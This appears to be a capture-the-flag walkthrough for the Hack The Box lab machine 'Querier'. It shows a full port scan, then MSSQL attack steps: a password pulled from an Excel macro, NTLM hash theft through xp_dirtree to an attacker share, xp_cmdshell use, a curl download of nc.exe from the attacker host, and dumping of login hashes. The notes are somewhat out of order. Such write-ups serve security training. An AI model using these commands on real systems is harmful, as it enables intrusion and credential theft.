sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.10.125
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-22 05:32 EDT
Nmap scan report for 10.10.10.125
Host is up (0.022s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-09-22T09:30:42
|_Not valid after: 2052-09-22T09:30:42
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
|_ssl-date: 2022-09-22T09:34:35+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=9/22%OT=135%CT=1%CU=34869%PV=Y%DS=2%DC=I%G=Y%TM=632C2C
OS:2A%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=
OS:U)OPS(O1=M539NW8NNS%O2=M539NW8NNS%O3=M539NW8%O4=M539NW8NNS%O5=M539NW8NNS
OS:%O6=M539NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%
OS:DF=Y%T=80%W=FFFF%O=M539NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
OS:Z)
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-09-22T09:34:31
|_ start_date: N/A
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.26 seconds
We get a file that is an excel file with macro. With an online research we find this article by Nairuz Abulhul that mentions
MS-SQL Server
We can connect with mssqlclient.py from impacket
Note: I was struggling with the impacket command turns out that in order to work the password neeeds to have not double quotes or no quotes BUT single quotes (seems to be because of the dollar sign in the pass)
Let's create a directory in our attacking machine mkdir querysmb
Now we just need to do the exec command to drop the hash exec xp_dirtree '\\10.10.14.7\myshare\'
Let's check our permissions with this user SELECT * FROM fn_my_permissions(NULL, 'SERVER');
We have many more than previously
Seems like we could event try xp_cmdshell again
SQL>EXECmaster..xp_CMDShell 'whoami';[-] ERROR(QUERIER): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
We can get the user flag EXEC master..xp_CMDShell 'type C:\Users\mssql-svc\Desktop\user.txt';
Let's get nc.exe in our target python3 -m http.server 80
EXEC master..xp_CMDShell 'curl.exe -o C:\Users\mssql-svc\Desktop\nc.exe http://10.10.14.7/nc.exe' we get it
EXEC master..xp_CMDShell 'dir C:\Users\mssql-svc\Desktop\' we check that it worked
Let's use wes to see what exploit we could use python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability" I will grep a few lines before and after to have the whole cve info
I also want to try PowerUp before using any kernel exploit
Using this olevba Currency\ Volume\ Report.xlsm we are able to find the password for SQL server
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
We can list the tables select * from volume.INFORMATION_SCHEMA.TABLES;
We can list users select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
SELECT CONCAT(sp.name, '***', master.sys.fn_varbintohexstr(sl.password_hash)) from master.sys.server_principals sp LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id
We can check the MS SQL version we have SELECT @@VERSION AS 'SQL Server Version';
Check if we have other db select name from sys.databases;
SELECT * FROM fn_my_permissions(NULL, 'SERVER'); check our user perms
